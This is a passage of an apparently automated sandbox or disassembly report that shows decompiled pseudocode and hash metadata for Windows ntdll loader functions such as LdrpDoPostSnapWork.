                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E0119934A() != 0) {
                                                                      								_t159 = E0120A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0x1275780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E01205510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0x1275780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E0119849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E01198999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E01198999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0x1275c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0x1275c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E011A2280(_t92, 0x12786cc);
                                                                      															_t94 = E01259DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E011B61A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0x1275c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E01198A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0x1275c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0x1275c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E011CF380(_t136, 0x1161184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E011A2280(_t108, 0x12786cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E011B61A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E01259D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E0119FFB0(_t118, _t156, 0x12786cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E011C9A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}
                                                                      0x00000000
                                                                      0x01198983
                                                                      0x011e9c65
                                                                      0x011e9c6d
                                                                      0x011e9c72
                                                                      0x011e9c75
                                                                      0x011e9c75
                                                                      0x011e9c82
                                                                      0x011e9c86
                                                                      0x011e9c87
                                                                      0x011e9c88
                                                                      0x011e9c89
                                                                      0x011e9c8c
                                                                      0x011e9c90
                                                                      0x011e9c95
                                                                      0x011e9c97
                                                                      0x011e9ca0
                                                                      0x011e9ca3
                                                                      0x011e9ca9
                                                                      0x011e9ca9
                                                                      0x00000000
                                                                      0x011e9ca9
                                                                      0x011e9ca3
                                                                      0x00000000
                                                                      0x011e9c97
                                                                      0x0119897d
                                                                      0x00000000
                                                                      0x01198974
                                                                      0x01198988
                                                                      0x01198992
                                                                      0x01198996
                                                                      0x00000000
                                                                      0x01198996
                                                                      0x0119894c
                                                                      0x00000000
                                                                      0x01198870
                                                                      0x0119887b
                                                                      0x0119887d
                                                                      0x0119887f
                                                                      0x01198881
                                                                      0x01198884
                                                                      0x01198884
                                                                      0x01198886
                                                                      0x01198889
                                                                      0x0119888c
                                                                      0x0119888e
                                                                      0x01198891
                                                                      0x01198891
                                                                      0x01198898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0119889a
                                                                      0x0119889b
                                                                      0x0119889e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011988a0
                                                                      0x011988a8
                                                                      0x011988b0
                                                                      0x011988b2
                                                                      0x011988d3
                                                                      0x011988d5
                                                                      0x00000000
                                                                      0x011988d7
                                                                      0x011988db
                                                                      0x011988dc
                                                                      0x011988e0
                                                                      0x011988e8
                                                                      0x011988ee
                                                                      0x011988f0
                                                                      0x011988f3
                                                                      0x011988fc
                                                                      0x01198901
                                                                      0x01198906
                                                                      0x0119890c
                                                                      0x0119890c
                                                                      0x0119890f
                                                                      0x01198916
                                                                      0x01198917
                                                                      0x01198918
                                                                      0x01198919
                                                                      0x0119891a
                                                                      0x0119891f
                                                                      0x01198921
                                                                      0x011e9c52
                                                                      0x011e9c55
                                                                      0x011e9c5b
                                                                      0x011e9cac
                                                                      0x011e9cc0
                                                                      0x011e9cc0
                                                                      0x011e9c55
                                                                      0x01198927
                                                                      0x01198927
                                                                      0x0119892f
                                                                      0x01198933
                                                                      0x00000000
                                                                      0x011988f5
                                                                      0x011988f5
                                                                      0x00000000
                                                                      0x011988f7
                                                                      0x011988f7
                                                                      0x011988fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011988fa
                                                                      0x011988f5
                                                                      0x011988f3
                                                                      0x00000000
                                                                      0x011988d5
                                                                      0x00000000
                                                                      0x011988b2
                                                                      0x011988c9
                                                                      0x00000000
                                                                      0x011988c9
                                                                      0x0119887f
                                                                      0x0119886a
                                                                      0x01198857
                                                                      0x01198852
                                                                      0x011988bf
                                                                      0x011988bf
                                                                      0x011987aa
                                                                      0x011987ad
                                                                      0x011987ae
                                                                      0x011987b4
                                                                      0x011987b5
                                                                      0x011987b6
                                                                      0x011987b8
                                                                      0x011987bd
                                                                      0x011987c1
                                                                      0x011987f4
                                                                      0x011987fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011987c1
                                                                      0x00000000

                                                                      Strings
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 011E9C18
                                                                      • LdrpDoPostSnapWork, xrefs: 011E9C1E
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011E9C28
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 1bb26b319eb1467c02883dafa4072e9a7c58708ba2f7eae486b48e07ce5f1d55
                                                                      • Instruction ID: 836abdfb035afef2b153f49065c1d725ac272240fcfb8c5f0cd2aceb36491b62
                                                                      • Opcode Fuzzy Hash: 1bb26b319eb1467c02883dafa4072e9a7c58708ba2f7eae486b48e07ce5f1d55
                                                                      • Instruction Fuzzy Hash: E5911331A0060EEFEF1CDF59D480ABAB7B5FF86318B454169D925AB241E730ED11CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 011E98A2
                                                                      • LdrpCompleteMapModule, xrefs: 011E9898
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 011E9891
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 73b7520aea714b5acb58486994c6d7975debc049dd91f336bd0e45e8764ee7ea
                                                                      • Instruction ID: 218970596c73cb67bed75bd3ac438850757e527dd7f0d72a6fc33760dc22b66a
                                                                      • Opcode Fuzzy Hash: 73b7520aea714b5acb58486994c6d7975debc049dd91f336bd0e45e8764ee7ea
                                                                      • Instruction Fuzzy Hash: 6151F635614B49DBEB2ECBADC944B7A7BE4AF00318F040659E9619B3E1D734ED00CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • @, xrefs: 0118E6C0
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0118E68C
                                                                      • InstallLanguageFallback, xrefs: 0118E6DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 371d7937dc500f7e63096591fcc3032a2c454fbbed07dbdf625c608c74e888ac
                                                                      • Instruction ID: 6a08605e17f0cb8e172937646e812e42a4abd1ea3d5e0daffbb511e17bc1ea10
                                                                      • Opcode Fuzzy Hash: 371d7937dc500f7e63096591fcc3032a2c454fbbed07dbdf625c608c74e888ac
                                                                      • Instruction Fuzzy Hash: 8A5111766097469BD718EF68C444B6BB7E9BF98718F01092EF985D7200F734DA04CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 1b0e94e4613a1f8aa98def236063f67d19fa4479745a635c4f414117a301e74e
                                                                      • Instruction ID: 48473ec2af7d50299ce35070cdff092d526c455ed7ceacdb545ff03264a2e4ef
                                                                      • Opcode Fuzzy Hash: 1b0e94e4613a1f8aa98def236063f67d19fa4479745a635c4f414117a301e74e
                                                                      • Instruction Fuzzy Hash: 25517D71A206099FDB26DFA8C980BADBBF8FF58704F14452DE649EB292D7719900CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011AB9A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 885266447-0
                                                                      • Opcode ID: eb25e9560301d1b673fdabcad8d09fd6c16c64e4b29e12371f82fa37c4c7f390
                                                                      • Instruction ID: f14e6263900b551dae1222ca9b42947967d94e0f4c319f1db641fb0b483dc72e
                                                                      • Opcode Fuzzy Hash: eb25e9560301d1b673fdabcad8d09fd6c16c64e4b29e12371f82fa37c4c7f390
                                                                      • Instruction Fuzzy Hash: 61516AB5608381CFC728CF69C09092BBFE5FB88614F95496EEA8587345D731E844CB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 32b77ba1c6612657b6027342fbd021233fde1e5339dafee6e8e9f0538d260a3c
                                                                      • Instruction ID: 50c47ee6c12fbd83ecc7ec1d6ee2e7c3e41736d884e095db91d5769b6a304f62
                                                                      • Opcode Fuzzy Hash: 32b77ba1c6612657b6027342fbd021233fde1e5339dafee6e8e9f0538d260a3c
                                                                      • Instruction Fuzzy Hash: 0851F171D006598EEF39CFE8C848BAEBBF1AF04714F1041ADE859EBA82D7344941CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 0da6f2a8b2351026cd9b56c9f9d0527fdbdeda522ed0145d969379f041de7aa6
                                                                      • Instruction ID: 2152a77cc3bc24a2e4554c04941ae0e9b107b7423252e31b3168d99e7724731b
                                                                      • Opcode Fuzzy Hash: 0da6f2a8b2351026cd9b56c9f9d0527fdbdeda522ed0145d969379f041de7aa6
                                                                      • Instruction Fuzzy Hash: FBC1B071E00619EBDB2DDF99D8C1BEEBBB1FF58700F054029E901AB250E774A946CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 011FBE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 160f92b1a0bf686c0968e6ac1ca7a52372b4260ebaabaf00749ec0cf8c5be492
                                                                      • Instruction ID: d04b151962935ae50aec8ede213dc468f6495cae8e324680a44b24784f8fcfc2
                                                                      • Opcode Fuzzy Hash: 160f92b1a0bf686c0968e6ac1ca7a52372b4260ebaabaf00749ec0cf8c5be492
                                                                      • Instruction Fuzzy Hash: 8EA10671B00617CBEB2DDF68C894BBEB7A5AF44724F04456DEA16CB681DB30D842CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 6942ede063548a2aacc1578daa5ad7629acbb3787f457a8c244b5d6f518eab3d
                                                                      • Instruction ID: be1888275cbf578a46193945d665f18a12ddd01e972a9d159a089d19bd16f1c6
                                                                      • Opcode Fuzzy Hash: 6942ede063548a2aacc1578daa5ad7629acbb3787f457a8c244b5d6f518eab3d
                                                                      • Instruction Fuzzy Hash: 5A613631A006569FDB3EEF6CC884B7E7BE5EB40714F158269E512972C1D7349A02CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 064d16ed3242202b0fb4a99f4b54889b4225867efa59874685fac449a673e60f
                                                                      • Instruction ID: 6539d1af17e7ed768cd5cffe0383e53c289903c25298d6cf0404f4b87590e42e
                                                                      • Opcode Fuzzy Hash: 064d16ed3242202b0fb4a99f4b54889b4225867efa59874685fac449a673e60f
                                                                      • Instruction Fuzzy Hash: 87518A713243429BE365DF28D9C5B2BBBE5EBC4714F04092CFA9697290DA71E805CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: e054626a5a43b9ccdc13859b9cc138a3240ae7e1bdc1a06a727dea84951c03d3
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: F0519E71504715AFC324DF29C840A6BBBF8FF58B14F00892EFA95876A0E7B4E915CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: ed65187d3d79831f102b1dd86ab476a0e818f4cb9adfcffbefb4d6ea62815768
                                                                      • Instruction ID: f35902b9e65f45d8e2b11d7e55eb4d9cb7a2fcfe61df58b189093f7a5e23820b
                                                                      • Opcode Fuzzy Hash: ed65187d3d79831f102b1dd86ab476a0e818f4cb9adfcffbefb4d6ea62815768
                                                                      • Instruction Fuzzy Hash: 684155B1D1052D9FDB21DA50CC84FAEB77CAB54718F0046A5E709AB281DB309E88CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 1d52a216a720a4e226f77f90daff6a964779af08dbdc58bfe90a6cf34d05c1cc
                                                                      • Instruction ID: d4583ce95def4789818e501ca5cc81ac990795c7017250d18738d0ca85d7594c
                                                                      • Opcode Fuzzy Hash: 1d52a216a720a4e226f77f90daff6a964779af08dbdc58bfe90a6cf34d05c1cc
                                                                      • Instruction Fuzzy Hash: 1A31E336D1151EAFEB16DB58C945E7BBB74FB80B20F014269EA55A72D2D7309E00C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: e1e121f2df7ef2c3b79fd504013537bbeff3fc646042b14c90cf41bf5d46802c
                                                                      • Instruction ID: 32a2544e7ca2d5cb831630d18f5c51bdd5d9f721c3401a1763ac74a8d29fbcba
                                                                      • Opcode Fuzzy Hash: e1e121f2df7ef2c3b79fd504013537bbeff3fc646042b14c90cf41bf5d46802c
                                                                      • Instruction Fuzzy Hash: 5131BEB650D3059FCB19DF68D8C09ABBBE8EB95658F01092EF98483261D735DD04CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WindowsExcludedProcs
                                                                      • API String ID: 0-3583428290
                                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction ID: 36053a60c6f5fb709bdf532b1d321c7a58cf1c41a7befaba6b2a3564936db9b1
                                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction Fuzzy Hash: E521F83A50055ABBEF2A9A99D844F9B7FEDAF51A60F064425FA148B200D730DD41C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx
                                                                      • API String ID: 0-89312691
                                                                      • Opcode ID: 57eafc8c71325199e22e448b9cd22ebb1f32bbdc1bff9d4bc718dbbf4c7373e3
                                                                      • Instruction ID: cf4fe3910b304ba66fc5683737adc57579f0aa33b685cf38489353a280fce444
                                                                      • Opcode Fuzzy Hash: 57eafc8c71325199e22e448b9cd22ebb1f32bbdc1bff9d4bc718dbbf4c7373e3
                                                                      • Instruction Fuzzy Hash: AE11E63C304E538BE77D4EAC849473E7E95AB85264FA6452AE562CB391DB70C8438342
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Critical error detected %lx, xrefs: 01238E21
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Critical error detected %lx
                                                                      • API String ID: 0-802127002
                                                                      • Opcode ID: ec2484ca90eb7c6dddf00b94d14e3d8dc6cefdbe0875bfb4c9c98249b0f9516f
                                                                      • Instruction ID: 5b2b62a302807bfa68936f1f9d2531b2cce4a7b93e3cc227bce5e1ed344c20a3
                                                                      • Opcode Fuzzy Hash: ec2484ca90eb7c6dddf00b94d14e3d8dc6cefdbe0875bfb4c9c98249b0f9516f
                                                                      • Instruction Fuzzy Hash: 891157B5D64349DADF29DFF8950679CBBB0BB58314F20425EE529AB2C2C3740602CF24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0121FF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                      • API String ID: 0-1911121157
                                                                      • Opcode ID: 81b63886506029ed856180fdaa1819e38e3ac88c82928effc4fed90d1677c0cb
                                                                      • Instruction ID: 7cfb5eeb4d31870d8ae4ad27f9390d993c735a31f2bdba334fc5489f06e41749
                                                                      • Opcode Fuzzy Hash: 81b63886506029ed856180fdaa1819e38e3ac88c82928effc4fed90d1677c0cb
                                                                      • Instruction Fuzzy Hash: 28110071960245EFEF2ADB54CA49F98BBF2FF18708F148044E2086B2E1C7789944CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf1a98220fa1c7aa38c254b0fc142cf92fc2be7eec534d7760023b1c1e4e8fb1
                                                                      • Instruction ID: 0a2a17b01a3305c21066df2cfc00e3a4895259c1728626cf695e20dcdab0c743
                                                                      • Opcode Fuzzy Hash: cf1a98220fa1c7aa38c254b0fc142cf92fc2be7eec534d7760023b1c1e4e8fb1
                                                                      • Instruction Fuzzy Hash: BC426B7192022ACFDB64CF68C880BA9BBB1FF45704F5481AADA4DEB342D7749985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
